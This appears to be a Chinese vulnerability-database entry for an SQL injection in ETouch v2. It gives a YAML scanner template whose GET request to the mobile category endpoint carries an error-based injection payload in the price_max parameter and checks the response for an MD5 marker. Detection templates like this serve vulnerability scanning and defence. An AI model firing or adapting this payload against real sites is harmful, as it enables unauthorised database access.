etouch-v2-sqli: ETouch v2 sqli

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

ETouch v2 sqli

PoC代码[已公开]

id: etouch-v2-sqli

info:
  name: ETouch v2 sqli
  author: MaxSecurity
  severity: high
  verified: true
  description: |-
    ETouch v2 sqli
  tags: etouch,sqli
  created: 2023/11/14

rules:
  r0:
    request:
      method: GET
      path: /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'
    expression: response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b")
expression: r0()